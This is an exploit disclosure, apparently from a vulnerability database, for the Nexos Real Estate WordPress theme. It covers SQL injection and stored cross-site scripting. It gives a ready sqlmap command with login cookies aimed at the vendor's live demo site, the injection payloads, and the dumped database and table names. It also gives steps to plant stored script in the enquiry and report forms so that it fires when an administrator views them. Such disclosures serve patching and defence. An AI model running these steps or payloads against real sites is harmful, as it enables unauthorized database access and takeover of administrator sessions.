Nexos - Real Estate WordPress Theme SQL Injection & Persistent XSS

2019.09.08
ru SubversA (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title: Nexos - Real Estate WordPress Theme SQL Injection & Persistent XSS # Google Dork: - # Date: 08/09/2019 # Exploit Author: SubversA # Vendor Homepage: https://listing-themes.com/ # Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242 # Version: 1.6 # Tested on: Parrot OS # CVE : - # CWE : 79, 89 ----[]- SQL Injection: -[]---- Vulnerable 'id' parameter is https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=8 You need a new user account (agent:agent on the demo website), then use the sqlmap (with --cookie option): sqlmap --url="https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=6" --cookie="wordpress_logged_in_0123456789=agent%7C1a2b3c4d5e6f7g8h9i0j; wordpress_sec_0123456789=agent%7C0a1b2c3d4e5f6g7h8i9j" --dbs -D geniuscr_nexos --tables [00:22:56] [INFO] resuming back-end DBMS 'mysql' [00:22:56] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: page=ownlisting_addlisting&id=-1899' OR 8845=8845# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: page=ownlisting_addlisting&id=6' AND (SELECT 7374 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(7374=7374,1))),0x7162717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fesJ Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: page=ownlisting_addlisting&id=6' OR SLEEP(5)-- wYvo --- available databases [2]: [*] geniuscr_nexos [*] information_schema Database: geniuscr_nexos [48 tables] +-------------------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_revslider_css | | wp_revslider_layer_animations | | wp_revslider_navigations | | wp_revslider_sliders | | wp_revslider_slides | | wp_revslider_static_slides | | wp_sw_cacher | | wp_sw_calendar | | wp_sw_currency | | wp_sw_dependentfields | | wp_sw_favorite | | wp_sw_field | | wp_sw_field_lang | | wp_sw_file | | wp_sw_inquiry | | wp_sw_invoice | | wp_sw_listing | | wp_sw_listing_agent | | wp_sw_listing_field | | wp_sw_listing_lang | | wp_sw_messages | | wp_sw_packagerank | | wp_sw_profile | | wp_sw_rates | | wp_sw_report | | wp_sw_repository | | wp_sw_reservation | | wp_sw_review | | wp_sw_savesearch | | wp_sw_search_form | | wp_sw_settings | | wp_sw_slug | | wp_sw_subscriptions | | wp_sw_tokenapi | | wp_sw_treefield | | wp_sw_treefield_lang | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-------------------------------+ ----[]- Persistent XSS: -[]---- You need a new user account, then go to any property listing on the website and use «ENQUIRY FORM» on the right sidebar. Vulnerable text area is «Message». Injection will trigger on the https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_messages page many times for any basic user. Or you can press the «REPORT LISTING» button on any property page and use your payload inside the «Message» text box. Injection will trigger on the https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=listing_reports page when administrator will be online.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top